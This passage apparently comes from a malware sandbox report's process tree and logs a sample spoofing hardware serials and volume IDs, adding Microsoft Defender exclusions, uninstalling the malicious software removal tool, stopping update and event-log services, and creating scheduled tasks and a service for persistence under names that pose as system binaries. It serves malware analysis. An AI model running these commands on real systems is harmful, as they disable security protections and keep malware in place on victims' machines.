                                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61069HP-TRGT7366FU
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:1356
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                              4⤵
                                                                PID:1620
                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31069HP-TRGT7366DQ
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:868
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                4⤵
                                                                  PID:988
                                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71069HP-TRGT7366MST
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:1332
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                  4⤵
                                                                    PID:1764
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:760
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: PM9G-8GIE
                                                                    4⤵
                                                                      PID:2064
                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: PM9G-8GIE
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:1488
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TAGO-868K
                                                                      4⤵
                                                                        PID:400
                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TAGO-868K
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:1304
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: M1I4-DHGN
                                                                        4⤵
                                                                          PID:2792
                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: M1I4-DHGN
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:628
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BO38-EH36
                                                                          4⤵
                                                                            PID:836
                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BO38-EH36
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:2784
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: DCPZ-6B0M
                                                                            4⤵
                                                                              PID:2660
                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: DCPZ-6B0M
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:2076
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UU08-FRTC
                                                                              4⤵
                                                                                PID:2196
                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UU08-FRTC
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2592
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 824E-4GKH
                                                                                4⤵
                                                                                  PID:2100
                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 824E-4GKH
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:948
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: SK00-MIVE
                                                                                  4⤵
                                                                                    PID:2192
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: SK00-MIVE
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2788
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: KSGA-URCU
                                                                                    4⤵
                                                                                      PID:576
                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: KSGA-URCU
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:820
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 03C0-KNH7
                                                                                      4⤵
                                                                                        PID:2884
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 03C0-KNH7
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2060
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PUTR-MPFV
                                                                                        4⤵
                                                                                          PID:1672
                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PUTR-MPFV
                                                                                            5⤵
                                                                                              PID:2116
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: UP0H-U19D
                                                                                            4⤵
                                                                                              PID:860
                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: UP0H-U19D
                                                                                                5⤵
                                                                                                  PID:1844
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: FT9V-J64C
                                                                                                4⤵
                                                                                                  PID:1260
                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: FT9V-J64C
                                                                                                    5⤵
                                                                                                      PID:2656
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: B3CU-SSG5
                                                                                                    4⤵
                                                                                                      PID:2108
                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: B3CU-SSG5
                                                                                                        5⤵
                                                                                                          PID:320
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: P62C-DLV4
                                                                                                        4⤵
                                                                                                          PID:1864
                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: P62C-DLV4
                                                                                                            5⤵
                                                                                                              PID:1508
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: ZCE2-ATHU
                                                                                                            4⤵
                                                                                                              PID:2512
                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: ZCE2-ATHU
                                                                                                                5⤵
                                                                                                                  PID:1640
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 2NGB-7I2R
                                                                                                                4⤵
                                                                                                                  PID:1524
                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 2NGB-7I2R
                                                                                                                    5⤵
                                                                                                                      PID:1860
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 63C3-182N
                                                                                                                    4⤵
                                                                                                                      PID:1960
                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 63C3-182N
                                                                                                                        5⤵
                                                                                                                          PID:1764
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: UCL4-MZ9V
                                                                                                                        4⤵
                                                                                                                          PID:1796
                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: UCL4-MZ9V
                                                                                                                            5⤵
                                                                                                                              PID:2572
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: MV0C-3TBE
                                                                                                                            4⤵
                                                                                                                              PID:1544
                                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: MV0C-3TBE
                                                                                                                                5⤵
                                                                                                                                  PID:1548
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: EOAC-3AKH
                                                                                                                                4⤵
                                                                                                                                  PID:840
                                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: EOAC-3AKH
                                                                                                                                    5⤵
                                                                                                                                      PID:2404
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: CF18-LAZP
                                                                                                                                    4⤵
                                                                                                                                      PID:2000
                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: CF18-LAZP
                                                                                                                                        5⤵
                                                                                                                                          PID:2688
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 6920-HUEI
                                                                                                                                        4⤵
                                                                                                                                          PID:1412
                                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 6920-HUEI
                                                                                                                                            5⤵
                                                                                                                                              PID:936
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                            4⤵
                                                                                                                                              PID:740
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                              4⤵
                                                                                                                                                PID:2344
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:380
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                  4⤵
                                                                                                                                                    PID:944
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2464
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2896
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1720
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:2528
                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
                                                                                                                                                          4⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2516
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
                                                                                                                                                            5⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:1804
                                                                                                                                                            • C:\ChainReview\sphyperRuntimedhcpSvc.exe
                                                                                                                                                              "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:1548
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\lsass.exe'
                                                                                                                                                                7⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:2360
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\lsass.exe'
                                                                                                                                                                7⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:1296
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'
                                                                                                                                                                7⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:2208
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'
                                                                                                                                                                7⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:1816
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'
                                                                                                                                                                7⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:2348
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ar9jVUwxcl.bat"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:2384
                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                    chcp 65001
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:960
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping -n 10 localhost
                                                                                                                                                                      8⤵
                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:2128
                                                                                                                                                                    • C:\ChainReview\lsass.exe
                                                                                                                                                                      "C:\ChainReview\lsass.exe"
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                      PID:1104
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            PID:2576
                                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                              4⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:1944
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2184
                                                                                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  PID:1276
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:2128
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:3040
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:1552
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:1544
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:2432
                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                4⤵
                                                                                                                                                                • Power Settings
                                                                                                                                                                PID:2180
                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                4⤵
                                                                                                                                                                • Power Settings
                                                                                                                                                                PID:2888
                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                4⤵
                                                                                                                                                                • Power Settings
                                                                                                                                                                PID:3012
                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                4⤵
                                                                                                                                                                • Power Settings
                                                                                                                                                                PID:1740
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:2740
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:600
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:1924
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                4⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:1080
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:2252
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                4⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:836
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                  5⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                  PID:1496
                                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                                          C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:832
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\ChainReview\lsass.exe'" /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:1576
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2608
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2904
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\ChainReview\lsass.exe'" /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2784
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2092
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2288
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'" /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2896
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2716
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:860
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "sphyperRuntimedhcpSvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'" /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2440
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "sphyperRuntimedhcpSvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2060
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "sphyperRuntimedhcpSvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:1484
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'" /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:3052
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:1336
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
